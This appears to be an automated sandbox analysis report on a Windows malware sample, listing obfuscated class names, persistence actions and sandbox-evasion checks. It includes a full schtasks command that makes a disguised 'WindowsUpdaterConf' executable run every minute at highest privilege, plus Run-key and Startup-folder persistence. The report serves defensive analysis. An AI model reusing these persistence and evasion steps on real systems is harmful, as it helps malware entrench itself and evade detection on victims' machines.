                            Source: 0.2.file.exe.372e50c.1.raw.unpack, tMAO7r0WOHxgOVEd4d8e72ywS3khYGrhlo8SRKKdrOhg6nZsRJKiewQT6qQGnKLIg1Gk86nO2p2g9qkpwi1mCSLBSK0tiIHqe.cs, High entropy of concatenated method names: 'Ca8zTJzOXdF1XSQ4Uk0FpAFOo2rQu3qbkh4a0jpCsszx69orcafgt1pMRuFysXcXVAvdzJfHK63BB3tIGhrx4UKJ9mCvGLImf', 'BsCxD3ZFBlqUAqkw03C6OFawqiuJh3FVrNq0AgUWOGTQr7W8KOdwxqAwhFyto07VH5QDaNuaDs', '_9g2PIVvmky60SRYqFTZNlEQzWl9HFnjfpjn79uczsnelcSLVM6ibgvMmvV2m4RueNeX1KUoTUi', 'IKtuZHsgDWC23EuZTzfTYEfHyq1TlxU1yd8VTwwOo2fzonMq2bCGGwrfJfCjLyuUFv7a14FKK9', 'wAdgfIPx5SYAlzcBKO4ZSEn5QqcenKawSCKd2N1ZgXAT8Tpvf2HiBLcyfE4CLe02H6JhqLYlNF'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 1BnXPKwu76MD4Cb65M8LmHIXPTlBOv59WZ1m6mGJAeUj7kFFjXtQiFRcNjc82JltgpD9ADnTthvnNFa.cs, High entropy of concatenated method names: 'jIAts4J7SShl0SnZCZ2gkzALnqqFAo4knxgDjyFyJsZy1KIf1yHykqF6IZmxWb4Oh5PhFHKTxcMFkgS', '_5eoEBBaBTWXSnJuepoNs4TcTHnr3VaddTKrQTF7zHuQ4ieGz5VTy1TjfXgqAEu05O2p7B8SnuZQTXTN', '_8sQh8EFYtgGY75yOMZGvjiNpOx2woGZ8rtJtHNHiKriCeH5BWwPFnGGXGTc1lD6zS4fv8jqc0UjGS8Q', 'BKBKCNODvQeLG22I0jqWMaps9uX5tsbUkthYpvVUSXWA2vy8ElYjtzZ6Y1fsnNmCR6UqEg78PYVKtHm', '_5elUGeMwq7NNd8a51NAP90UUpqyL2LrjGXRB8Baz8Vl3nYZ3m7hB0eKQzUtvyqQafhXIgEosJGyTF5m', 'mGssgndyPnxcE0LtnEdfXXZvvXiLgd94fm2h93iPrXnLEBQ4tsxxVwLgLUmaZFclPRPkCyq4wullJcP', 'mmhaWzq3hbZDQtQfBmi6A8xsuojtIjpwkYcuSyKWQpGn8eeV49dKJNKyspXSyPoHnlpCJbEEajwDCSD', 'Qyn7BLsbvR7PFqxIiNVP1v0Q1fRYiLQ3u9c8XODGPmTC3z983bEsXg5aGSMYT8tIr8FQikYx1E1nSQY', 'rczk6Yu4zaajD1rmtzB9W3U5xfWVLQc0dZ9gHgkoolEU8t8kcGKnqIEQW9sbreo5KK9YXalLfdWyor4', 'oWOoQ0Q4mLJozToPqQOyElta7Iv7g8WQknxxwudkN1nxvdtcWtsHoKdZTs58Bzrxysq95A8Uf3RiImG'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, k8oQBqD1FfB24uQwQAjscQBcsRADnbcSlYbhctv49NQ6vnVNBf7Ya7d8yz6WlHsmiF1cUrk5wKP0Ck0EhJaUIVsGRyNgB9EqY.cs, High entropy of concatenated method names: 'PURSdKwf6uUyuIeo01L2wrL5YXcCJwixZhm674K30OY5BSgs3bqlEy7laHmEUyKJbssQbefNGkLpdhY3qbUxPJoFdHC8GIG51', 'L5841UcNRl6sDIKgIUn3k62zuYMJHDch8788FKzYRQFFOUztBjvifBP2qT8N9IoOGAnVTSiitdywd3xyNAQhJQZG5qaN8fzId', 'ra1ye9xo1HKMcEldMPxQsQP6MYWDbRGeaR9jjEdpj4oHwTnSXZisafqZoHJuduP461A7BqNDnqxosaRnqz83lKIRGNuwDqgfF', 'qukIAc99XGERtJeVCLU6USjGcFvgJkBC5LR9CG6P39hljCvzMCa2ZZUDAh0jH1cp2ybshyw0BgGNqF6qLJdRF3Qjjr8Qv0h3k', 'pYTsImnQKLmW3xKKnPrcg35rY9B4i7SlFf0KkFgEUlsXt4FsAarRYyrwyBtoGBfMMams8IHUQHxxK6RnLRo3baRsA6hsti8l5', 'O30rLSFEndQTifNrEdMCJg4ZFU3JKpzjswfnYbvdDKQKolSQKiGrPlNPxrcqdc2Rk0lGuhxO4mn3W7h9UWxUNaRyRvkMpzj5o', 'tRZmsk83jO6u1QL1ZvHrVPrzQe3b35wwRa6PdBHZkAJsJjjLWup4g6eNPMwBmzli1LqREsOVzV9aDhDQeuZ7isup9XyjeuWbs', 'ebOrWyYhaOZ9d7RJL2HfVfNxqSknUkHnvcMkdbLk3d8QaRnKq2jVXnNXzOuy8GLIfV4DKNpWX9N5v5KsFs2fztNI6GfRjoX3V', '_0OjaokSk0Jw2HMEf8RKTQlO4kotXk9ZR8ZhunU18WGsvtNiWdTrBvfCqTBVgLwLuyFQINmEhzNqytgMfn3', 'IolwZpH1HLIXDIPe24xVknOEjyfwUu6y82DwGcLuyJxiMcYNZjBhCw0dZZx5fqQPNCLn949YUJOPHzjRk1'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs, High entropy of concatenated method names: 'Lhw0EuwZ1fYIXLm5zrgpgRUbVTHXSDF2UCl7sGRGNiKZGMaC27UtCm3qDwC0ozmQ', 'OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS', 'G8yIH49uHGWslxXVEd59mIK5OUM3NiHV3KycjgvoyP5SJ2cB6Ytwzi9pIVfYU97n', 'ZekE3xuuJcMYGquyAUKRuDmYetQzqS06YpX1KnoRr9qre5jhasUlcExY45yFYOLS', 'RBvskQfc3AMcmgirQvncxeQJmjmgL7YQ9wUr2I8WJ66RnIqfjOnevV11hsmxUJgR', 'f27hxCph9imrmui07eYZcWhaU1AMkeEzwgi4CyHQVeVpnmYkk0YqUkWyH7kUhKn0', 'T4J9MR6iuMf1VdM9IW27cNsEc15XpDFbjQ1ZWWz00SeCAUibCNaBGdPXYGplydzA', '_7GI4uKlZRmnHlcjXo4KgOrdzuxBpaTwB9sOr8xhMgBMQp03dZ8lwkpUs6EtCEbgy', 'js9mCAIRcVKsY7NmghkvjOTA96W5z24CKxGN1hjyzZzD5llhBusXMY0MAFNbej4KswDAGE5ZpKlk9fynf6c18hdZ0UgLYTGO0', 'sP9vXYu5dJDBXVSoG3JOQWdBdVjvv2yf1yp5J1hZnpH60pPk2kYAO8pNuMAsXoEm9fdJzi2VVNywQ0VZnwMWSwgj7hF6uwtdF'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, ub7IeQ5sqWntl1qadx7oq8YPwaBWDRNX9iR60l23xp96M8SJ85dQZQ0Jlyoi3nwkDA9WIIBOt0Hb0HYwHI.cs, High entropy of concatenated method names: 'H2RSsZFKRrHRT65cfj1Xt86ijqMLzBbhqqyo9tS3BTuyFl36DNaS74BiNpx9RXeFVIr0gOFUpzoNkqevAK', 'm7jKQ9artMQi15JY', 'cC6KrzcON6oUu94C', 'xlFJfWFmLDceh0wF', 'IV62WVx1P90yMgcl'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.cs, High entropy of concatenated method names: 'ltdvSTmuDwBFxehfhJITmk7EjiC5LtSjvbgKwuUpdQh9Sh9IDPHrvBVnvmOmDjRI', 'OzPzG0vNO9oBkRBCfVLBP3EqlDUV3EoLZznjtrjt7nZtyUeWKNPez4kBqSY9ObiU', 'uodld5Psb4FuTMXQf6h7IUWD6PTMuS2Qc7TBCPiTqUieoTGTmRKHOPncvTJic8rB', 'u1WayCkYPUkQZgvoxrdU33C45lKbkZr044i1dl9TxVWnUpRCo1c2bpBZKyfTvxpa', 'uB0MHsnOyEIA2Wrc8yUc6BijIDBv6tPvlQ2YGbJaEJmL9jeiVkNss7RyTRwOoWB8', 'WLW7MpcGbsiFbXTpRmancjelVxRWkFNRZbTbYhbrRKoLsPlM5Yqi46CRoqhzZdSu', 'Kk1RT2LIUI7b6bfYb8aSFepH5gkeFIO4somhtQ50uLzx31p0mGX60fXO9yKICQp0', 'Vk2sUIA1bkvO8AhgrzBdwWMlWz0YBDwolSLiYjRWqygIAb3yH3X5DL36Xh2SynWC', 'XgdUNkMUXEXGC2TVTReadLd0ZlSGfqldf228i9ggBJH3QVbMB0ybcOg8h5B8q1pM', 'plvpD1pR7iBdqDimQRP5q9IEu8BUfF9RjWsg0JDOrhivlMC7fsfXUeR5JV6SuHGD'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, d46Zv2qYbaQJDMbZ7Xt1F2PnAlaWbc40N1LuG79B9IpFWHdOqXitnmSGc4QjuU9D7djj6HwceM2y3rralb.cs, High entropy of concatenated method names: 'W1SH7JjcsI8sTnwKEy5ILvF0kL2cI0ZyQY6ygglXZsU3AqHKHFLb5nTJMzn1opEmHsqhnssg8igxNeTjqV', 'Bc8aYFCKF5DlIWuz0WE9up88nhWMEFbsJWzwk8E1IbVfAFN3LVm6HRwfQBq1HyNFqog2785atf61STkiA4', 'sxCXhjmnGtAQ7QpCyXm6hPTO0WsFjg7RxaeRT87XPU9lJIBzdNXhy01KK7wlmU5GdENw8yZkuTKyBL8cpw', 'C24mPs6zaxpv5tbRh4agFza8K3WvAQU9CRVWmTlOYUKp4MTfUxlFze2YOxO4evCawHj5xbwv0sYz1F12w1', '_8aGks2WbjOcupJTr0kPmVoHQknH4VTxWv6BUfJhJ99GLXd7ytrXvFtow9Pnas76JTrSuArqfYQ', 'rLHAojLGqYxJ2rxj', '_0xB1uBLsDSIBpH4x', 'mXJA63SBxx6jb4pQ', '_32sqqCGc2QDZqDpG', 'nQSinV7QBHDbQCpk'
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Roaming\file.exe
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\WindowsUpdaterConf.exe (logged 2 times)

                            Boot Survival

                            Source: C:\Users\user\Desktop\file.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 666999666 (logged 4 times)
                            Source: C:\Users\user\Desktop\file.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConf (logged 3 times)
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\WindowsUpdaterConf.exe
                            Source: C:\Users\user\Desktop\file.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk (logged 2 times)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (logged 16 times)
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (logged 12 times)
                            Source: C:\Users\user\Desktop\file.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\file.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Users\user\Desktop\file.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string:
Source: file.exe, 0000000E.00000002.2228777015.0000000001835000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLLD
Source: file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
Source: file.exe, 00000000.00000002.1754386213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.2241827212.0000000003442000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000016.00000002.2211795636.0000000002701000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 0000001B.00000002.2323696977.0000000002982000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 0000001E.00000002.2283079666.0000000003131000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 00000021.00000002.2355414585.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 00000025.00000002.3066688443.0000000003362000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 00000028.00000002.3653291877.0000000003182000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: $FQ>112#127#122#115#119#117#98#127#96#127#98#111#97#119#98#117#126`,FQ SBIEDLL.DLLOLHELPERENTYZER
Source: C:\Users\user\Desktop\file.exe; Memory allocated: 31C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe; Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe; Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe; Memory allocated: 11C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe; Memory allocated: 2BD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe; Memory allocated: 4BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\file.exe; Memory allocated: 32F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\file.exe; Memory allocated: 3430000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\file.exe; Memory allocated: 5430000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\file.exe; Memory allocated: D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\file.exe; Memory allocated: 2700000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\file.exe; Memory allocated: 4700000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: EE0000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 2970000 memory reserve | memory write watch
